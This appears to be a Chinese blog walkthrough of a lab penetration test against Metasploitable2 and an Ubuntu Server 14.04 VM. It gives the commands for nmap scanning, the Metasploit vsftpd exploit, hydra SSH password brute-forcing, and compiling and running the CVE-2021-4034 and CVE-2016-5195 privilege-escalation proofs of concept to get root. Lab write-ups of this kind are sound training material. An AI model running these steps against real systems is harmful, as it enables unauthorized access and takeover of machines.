metasploitable2与Ubuntu Server 14.04.1 LTS渗透

环境搭建

kali:
metasploitable2:10.10.10.139 下载链接:https://pan.baidu.com/s/14iPfB0EnG-orRIPvvN4vxg?pwd=babt
Ubuntu Server:10.10.10.135 下载链接:https://pan.baidu.com/s/13w8O8A8c79ubCN2BC3RrBQ?pwd=gatw
让kali与两个靶机用同一张网卡
在这里插入图片描述

一、metasploitable2渗透

arp-scan -l 
# 用于扫描一个网络中的ARP(地址解析协议)表。ARP表是一个映射表,用于将IP地址转换为MAC地址。
# 通过使用arp-scan -l命令,可以列出网络中所有设备的ARP表项

得到metasploitable2靶机IP:10.10.10.139
在这里插入图片描述

nmap -sV -O 10.10.10.139 
# -sV:这个参数用于启用版本检测扫描。Nmap将尝试确定目标主机上开放端口的服务版本信息。
# -O:这个参数用于启用操作系统检测。Nmap将尝试确定目标主机的操作系统类型。

发现21端口开放
在这里插入图片描述

msfconsol #开启msf
search #找到关于vsftpd漏洞模块

也可以用445端口的samba漏洞
在这里插入图片描述

use 1 #使用模块1
set rhosts 10.10.10.139 #设置靶机IP
run # 开始攻击

直接获得root
在这里插入图片描述

二、Ubuntu Server渗透

需要用到的poc:链接:https://pan.baidu.com/s/1iiOGAWlsk2DP7Bgp0Nfhdg?pwd=pock
先获取靶机ip
在这里插入图片描述
发现靶机开放22端口,可以使用爆破获取登录用户和密码
在这里插入图片描述

hydra -L e.txt -P passwd.txt 10.10.10.135 ssh -f
# -L 指定用户名字典
# -P 指定密码字典
# -f 表示在破解过程中使用fork模式。这意味着Hydra会同时尝试多个用户名和密码组合

在这里插入图片描述

ssh -p 22 codingteam@10.10.10.135 #远程登录到靶机

在这里插入图片描述

uname -r #显示操作系统的发行版号。

在这里插入图片描述
这里我换成MobaXterm_Personal_12.4远程到靶机
上传Linux-Exploit-Suggester.sh(liunx辅助提权脚本)到靶机

mv Linux-Exploit-Suggester.sh lse.sh #把脚本重命名为lse.sh

我们将用到CVE-2016-5195和CVE-2021-4034
在这里插入图片描述

CVE-2021-4034-main利用

将下载好的文件上传到靶机

cd cve-2021-4034-main #进入文件目录
gcc cve-2021-4034-poc -o exp 
#用GCC编译器编译一个叫做cve-2021-4034-poc的POC(Proof of Concept,概念证明)
# -o exp 命名为exp
./exp #运行poc代码

发现已经获取root权限
在这里插入图片描述

CVE-2016-5195-master

进入codingteam用户具有可执行的目录:home或者tmp
可以使用ls -al 查看对目录所有的权限
将CVE-2016-5195-master上传到拥有可执行的目录下
在这里插入图片描述

pwd #查看当前路径
mv CVE-2016-5195-master CVE #将文件重名为CVE
cd CVE #进入文件目录
make #编译
./dcow #运行提权脚本

它会给出一个密码,复制后输入su提权
可以发现我们已经是root了
在这里插入图片描述
-=============================================-
有不足之处,请各位指出

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值